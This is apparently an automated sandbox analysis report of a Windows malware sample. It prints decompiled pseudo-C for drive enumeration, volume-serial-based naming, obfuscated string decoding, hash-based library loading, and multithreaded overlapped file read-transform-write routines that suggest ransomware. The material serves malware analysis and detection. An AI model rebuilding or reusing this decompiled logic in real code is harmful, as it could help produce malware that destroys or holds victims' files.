                                                                                                                                                            • Instruction Fuzzy Hash: A841A372D85208BBDB229BD0DC42FEF7B7CEF59710F00401AFB15E2152E7219A9197A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E009C797A(int _a4) {
                                                                                                                                                            				short _v6;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				WCHAR* _t11;
                                                                                                                                                            				int _t17;
                                                                                                                                                            				signed int _t19;
                                                                                                                                                            				void* _t30;
                                                                                                                                                            				WCHAR* _t32;
                                                                                                                                                            
                                                                                                                                                            				_t11 = E009C47AB(0xfffe); // executed
                                                                                                                                                            				_t32 = _t11;
                                                                                                                                                            				if(_t32 == 0) {
                                                                                                                                                            					return _t11;
                                                                                                                                                            				}
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x573, 0xc, 0xe,  &_v20);
                                                                                                                                                            				_v6 = 0;
                                                                                                                                                            				E009C61A7(_t32,  &_v20);
                                                                                                                                                            				_t30 = 0x5a;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_push(_t32);
                                                                                                                                                            					if( *(_t32 + 8) > _t30) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t17 = GetDriveTypeW(); // executed
                                                                                                                                                            					if(_t17 == 2 || _t17 == 3) {
                                                                                                                                                            						 *0x9d1d00 =  *0x9d1d00 & 0x00000000;
                                                                                                                                                            						E009C761A(_t32, _a4); // executed
                                                                                                                                                            						_t19 =  *(_t32 + 8) & 0x0000ffff;
                                                                                                                                                            						if(_t19 >= 0x61 && _t19 <= 0x7a) {
                                                                                                                                                            							 *(_t32 + 8) = _t19 & 0x0000ffdf;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					 *(_t32 + 8) =  *(_t32 + 8) + 1;
                                                                                                                                                            					 *((short*)(_t32 + 0xe)) = 0;
                                                                                                                                                            				}
                                                                                                                                                            				E009C47F8();
                                                                                                                                                            				return 1;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • GetDriveTypeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,009C3502,?,?,00000000,00000000), ref: 009C79C6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDriveProcessType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1501148493-0
                                                                                                                                                            • Opcode ID: 9866d9d1813ef95e08e539fb2e1eb8f03eae1afd6ecf9f75f6f6b772e915d104
                                                                                                                                                            • Instruction ID: b8b557f13b905c818834d75c75ce6d1e00ddb03b517755c54e5ae95a2e1e7244
                                                                                                                                                            • Opcode Fuzzy Hash: 9866d9d1813ef95e08e539fb2e1eb8f03eae1afd6ecf9f75f6f6b772e915d104
                                                                                                                                                            • Instruction Fuzzy Hash: 5D014833D58A0565E320BBE4DC02FBFB3A9EF42721F108C2EE516D50D1E66099808757
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E009C4F25(void* __edx) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				short _v12;
                                                                                                                                                            				short _v28;
                                                                                                                                                            				char _v92;
                                                                                                                                                            				WCHAR* _t11;
                                                                                                                                                            				char _t12;
                                                                                                                                                            				void* _t14;
                                                                                                                                                            				void* _t30;
                                                                                                                                                            				WCHAR* _t31;
                                                                                                                                                            
                                                                                                                                                            				_t30 = __edx;
                                                                                                                                                            				_t11 = E009C47AB(0x22);
                                                                                                                                                            				_t31 = _t11;
                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                            					_t12 = E009C569B(); // executed
                                                                                                                                                            					_v8 = _t12;
                                                                                                                                                            					_t14 = E009C6962(0x539,  &_v8, 4);
                                                                                                                                                            					E009C4832( &_v92, 0, 0x40);
                                                                                                                                                            					E009C4B58(_t30,  &_v92);
                                                                                                                                                            					E009C5DE2(0x9d12d0, 0x2d, 8, 0x10,  &_v28);
                                                                                                                                                            					_v12 = 0;
                                                                                                                                                            					_push(_v8);
                                                                                                                                                            					wsprintfW(_t31,  &_v28, E009C6962(_t14,  &_v92, E009C623D( &_v92)));
                                                                                                                                                            					return _t31;
                                                                                                                                                            				}
                                                                                                                                                            				return _t11;
                                                                                                                                                            			}













                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                              • Part of subcall function 009C569B: GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C56BE
                                                                                                                                                            • wsprintfW.USER32 ref: 009C4FA8

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E009C3740(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				long _t9;
                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				void* _t20;
                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                            
                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x150)) = 3;
                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x154)) = _a8;
                                                                                                                                                            				if( *0x9d2278 == 1) {
                                                                                                                                                            					_t15 =  *((intOrPtr*)(_t18 + 0x24));
                                                                                                                                                            					_t11 =  *((intOrPtr*)(_t18 + 0x20));
                                                                                                                                                            					_t22 = _t15;
                                                                                                                                                            					if(_t22 >= 0 && (_t22 > 0 || _t11 > 0x100000)) {
                                                                                                                                                            						asm("sbb ecx, 0x0");
                                                                                                                                                            						_push(_t15);
                                                                                                                                                            						E009C75E6(_t18, _t11 - 0x100000);
                                                                                                                                                            						_t19 = _t19 + 0xc;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t17 = _t18 + 0x28;
                                                                                                                                                            				_t9 = E009C7600(_t18, _t18 + 0x28, 0xe8); // executed
                                                                                                                                                            				_t20 = _t19 + 0xc;
                                                                                                                                                            				while(_t9 == 0) {
                                                                                                                                                            					_t9 = RtlGetLastWin32Error();
                                                                                                                                                            					if(_t9 == 0x3e5) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					E009C568D(_t9, 0x64);
                                                                                                                                                            					_t9 = E009C7600(_t18, _t17, 0xe8);
                                                                                                                                                            					_t20 = _t20 + 0x10;
                                                                                                                                                            				}
                                                                                                                                                            				return _t9;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C379F

                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                            			E009C36C9(void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                            				long _t17;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                            				void* _t22;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            
                                                                                                                                                            				_t19 = __edx;
                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                            				E009C82C9(_t21 + 0x110, _t21 + 0x15c, _t21 + 0x15c, _a8);
                                                                                                                                                            				 *((intOrPtr*)(_t21 + 0x154)) = _a12;
                                                                                                                                                            				 *((intOrPtr*)(_t21 + 0x150)) = 2;
                                                                                                                                                            				asm("cdq");
                                                                                                                                                            				_push(_t19);
                                                                                                                                                            				E009C75E6(_t21,  ~_a8);
                                                                                                                                                            				_t17 = E009C7600(_t21, _t20, _a8); // executed
                                                                                                                                                            				_t23 = _t22 + 0x28;
                                                                                                                                                            				while(_t17 == 0) {
                                                                                                                                                            					_t17 = RtlGetLastWin32Error();
                                                                                                                                                            					if(_t17 != 0x3e5) {
                                                                                                                                                            						E009C568D(_t17, 0x64);
                                                                                                                                                            						_t17 = E009C7600(_t21, _t20, _a8);
                                                                                                                                                            						_t23 = _t23 + 0x10;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					break;
                                                                                                                                                            				}
                                                                                                                                                            				return _t17;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C7600: WriteFile.KERNEL32(?,?,009C3673,00000000,?,?,009C3713,?,?,?,?,?), ref: 009C7612
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3718
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWin32Write
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2457671358-0
                                                                                                                                                            • Opcode ID: 03f6508b5fc2f50e9868227dfb9455b21a37afcbb0d30eda07eeccd9f1a19bea
                                                                                                                                                            • Instruction ID: 8d1451dc4dd72aca0af8e03e70fb60159911f61cf4eeb70e683dc2d81b483af9
                                                                                                                                                            • Opcode Fuzzy Hash: 03f6508b5fc2f50e9868227dfb9455b21a37afcbb0d30eda07eeccd9f1a19bea
                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0A4B6900A48BBCB126FE9CC4AFDB77ACDFCA314F00840DF91886201D634A64087B3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C748F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12, _Unknown_base(*)()* _a16) {
                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				void* _t9;
                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                            
                                                                                                                                                            				_t7 = E009C476A(_a8); // executed
                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                            				 *_t21 = _t7;
                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                            					_t8 = CreateIoCompletionPort(0xffffffff, 0, 0, _a12);
                                                                                                                                                            					 *(_t21 + 4) = _t8;
                                                                                                                                                            					if(_t8 != 0) {
                                                                                                                                                            						_t9 = E009C743F(_t21, _a16); // executed
                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                            							return 1;
                                                                                                                                                            						}
                                                                                                                                                            						E009C4787( *_t21);
                                                                                                                                                            						E009C4B21( *(_t21 + 4));
                                                                                                                                                            						L4:
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					E009C4787( *_t21);
                                                                                                                                                            					goto L4;
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				return 0;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C476A: HeapCreate.KERNEL32(00000000,00000000,00000000,?,009C749B,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C477F
                                                                                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,009C3571,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C74B2
                                                                                                                                                              • Part of subcall function 009C743F: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C7463
                                                                                                                                                              • Part of subcall function 009C4787: HeapDestroy.KERNEL32(00000000,?,009C74DF,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C478D
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1739922738-0
                                                                                                                                                            • Opcode ID: 86137bb47feb86b2f565dac7b01bbda650574f81b9c5bf3efd5bdd95218eb08c
                                                                                                                                                            • Instruction ID: 0c8a239fbb179f0b5994299c482dcf648cca6ed87a087d4efa617aadffc26f7d
                                                                                                                                                            • Opcode Fuzzy Hash: 86137bb47feb86b2f565dac7b01bbda650574f81b9c5bf3efd5bdd95218eb08c
                                                                                                                                                            • Instruction Fuzzy Hash: 88F09C31A0C202ABDB252FA0EC11F56BF9ADF41771F20852DF555D50B1EB21D8505E43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C743F(void* _a4, _Unknown_base(*)()* _a8) {
                                                                                                                                                            				signed int _t8;
                                                                                                                                                            				void* _t11;
                                                                                                                                                            				void* _t14;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t18;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            
                                                                                                                                                            				_t19 = _a4;
                                                                                                                                                            				_t18 = 0;
                                                                                                                                                            				 *((intOrPtr*)(_t19 + 8)) = 0;
                                                                                                                                                            				_t8 = E009C5370(); // executed
                                                                                                                                                            				if((_t8 & 0x7fffffff) <= 0) {
                                                                                                                                                            					L3:
                                                                                                                                                            					return 1;
                                                                                                                                                            				} else {
                                                                                                                                                            					goto L1;
                                                                                                                                                            				}
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t11 = CreateThread(0, 0, _a8, _t19, 0, 0); // executed
                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) + 1;
                                                                                                                                                            					E009C4B21(_t11); // executed
                                                                                                                                                            					_t18 =  &(_t18->nLength); // executed
                                                                                                                                                            					_t14 = E009C5370(); // executed
                                                                                                                                                            					if(_t18 < _t14 + _t14) {
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L3;
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5370: GetSystemInfo.KERNEL32(?,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C537A
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C7463
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 908986755-0
                                                                                                                                                            • Opcode ID: a2687a02d976ee8a5cd8e505380b1c444c70043067e081e2da40405f12ca37f2
                                                                                                                                                            • Instruction ID: 8c3d3c3310190faf6067c5993102d1446f44c0ed736595b4113dae8a61235d69
                                                                                                                                                            • Opcode Fuzzy Hash: a2687a02d976ee8a5cd8e505380b1c444c70043067e081e2da40405f12ca37f2
                                                                                                                                                            • Instruction Fuzzy Hash: 86F0A772E04208BF97042AB6EC80F7BBB9DDA452F9310493EB51AC2061D534DC818971
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C326E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				void* _t10;
                                                                                                                                                            				long _t11;
                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                            				void* _t18;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            
                                                                                                                                                            				_t17 = _a8;
                                                                                                                                                            				_t16 = _t17 + 0x15c;
                                                                                                                                                            				 *((intOrPtr*)(_t17 + 0x150)) = 1;
                                                                                                                                                            				 *((intOrPtr*)(_t17 + 0x154)) = _a12;
                                                                                                                                                            				_t10 = E009C75CC(_t17, _t17 + 0x15c,  *((intOrPtr*)(_t17 + 0x158))); // executed
                                                                                                                                                            				_t19 = _t18 + 0xc;
                                                                                                                                                            				while(_t10 == 0) {
                                                                                                                                                            					_t11 = RtlGetLastWin32Error();
                                                                                                                                                            					if(_t11 != 0x3e5) { // 0x3e5 = ERROR_IO_PENDING (997)
                                                                                                                                                            						if(_t11 == 0x26) { // 0x26 = ERROR_HANDLE_EOF (38)
                                                                                                                                                            							return E009C2EB9(_a4, _t17);
                                                                                                                                                            						}
                                                                                                                                                            						E009C568D(_t11, 0x64);
                                                                                                                                                            						_t10 = E009C75CC(_t17, _t16,  *((intOrPtr*)(_t17 + 0x158)));
                                                                                                                                                            						_t19 = _t19 + 0x10;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					return _t11;
                                                                                                                                                            				}
                                                                                                                                                            				return _t10;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C75CC: ReadFile.KERNEL32(?,?,009C367E,00000000,?,?,009C329C,?,?), ref: 009C75DE
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C32A1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastReadWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3522703849-0
                                                                                                                                                            • Opcode ID: 32ef54ea6d84ed07fcef793713542cd5c15cb88334393cc56d80574883b6f5ea
                                                                                                                                                            • Instruction ID: b233dff5ef02eb9948cfee6212b47cf1262d0aa58cb378ddb661e008d1a4d5aa
                                                                                                                                                            • Opcode Fuzzy Hash: 32ef54ea6d84ed07fcef793713542cd5c15cb88334393cc56d80574883b6f5ea
                                                                                                                                                            • Instruction Fuzzy Hash: D7F02B32D04B40ABDF202FA89C09FCB77ACDFCA710F00881EF92956240D67172448BA3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C756B(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28) {
                                                                                                                                                            				void* _t17;
                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                            
                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0xc)) = 0;
                                                                                                                                                            				 *((intOrPtr*)(_t27 + 8)) = 0;
                                                                                                                                                            				// dwFlagsAndAttributes 0x48000000 = FILE_FLAG_OVERLAPPED | FILE_FLAG_SEQUENTIAL_SCAN
                                                                                                                                                            				_t17 = CreateFileW(_a8, _a20, _a24, 0, _a28, 0x48000000, 0); // executed
                                                                                                                                                            				 *(_t27 + 0x14) = _t17;
                                                                                                                                                            				if(_t17 != 0xffffffff) {
                                                                                                                                                            					_t18 = E009C6202(_a8);
                                                                                                                                                            					 *((intOrPtr*)(_t27 + 0x18)) = _t18;
                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                            						 *((intOrPtr*)(_t27 + 0x20)) = _a12;
                                                                                                                                                            						 *((intOrPtr*)(_t27 + 0x24)) = _a16;
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            					E009C4B21( *(_t27 + 0x14));
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(C0000000,?,00000000,00000000,009C3094,48000000,00000000,00000000,?,009C3094,00000000,?,?,00000000,C0000000,00000000), ref: 009C758D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 1064252c72c8d3a74346795ec60234fffa3ad5bf0061c581b8b71de59b6015e7
                                                                                                                                                            • Instruction ID: 896a89a8ac12d80b1c8aaf710fc05eab23c0d471a91ec7d10446c9202bae4fb1
                                                                                                                                                            • Opcode Fuzzy Hash: 1064252c72c8d3a74346795ec60234fffa3ad5bf0061c581b8b71de59b6015e7
                                                                                                                                                            • Instruction Fuzzy Hash: 08011DB5914649AFDB209F64EC00AAABBE9FF08320B104A2AFC56C2650E331E9509F51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                            			E009C569B() {
                                                                                                                                                            				long _v8;
                                                                                                                                                            				signed int _t9;
                                                                                                                                                            				WCHAR* _t16;
                                                                                                                                                            
                                                                                                                                                            				_t16 = E009C5BD3();
                                                                                                                                                            				_t7 = 0;
                                                                                                                                                            				if(_t16 != 0) {
                                                                                                                                                            					_t16[3] = 0;
                                                                                                                                                            					_t9 = GetVolumeInformationW(_t16, 0, 0,  &_v8, 0, 0, 0, 0); // executed
                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                            					_v8 = _v8 &  ~_t9;
                                                                                                                                                            					E009C47F8(_t16);
                                                                                                                                                            					_t7 = _v8;
                                                                                                                                                            				}
                                                                                                                                                            				return _t7;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5BD3: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,009C56A5,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C5BD8
                                                                                                                                                            • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C56BE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryInformationVolumeWindows
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3487004747-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6F1E() {
                                                                                                                                                            				char _v5;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				struct HINSTANCE__* _t8;
                                                                                                                                                            
                                                                                                                                                            				E009C5DE2(0x9d12d0, 0x82f, 0xa, 7,  &_v12);
                                                                                                                                                            				_v5 = 0;
                                                                                                                                                            				E009C707D(0x5e69269d);
                                                                                                                                                            				_t8 = LoadLibraryA( &_v12); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

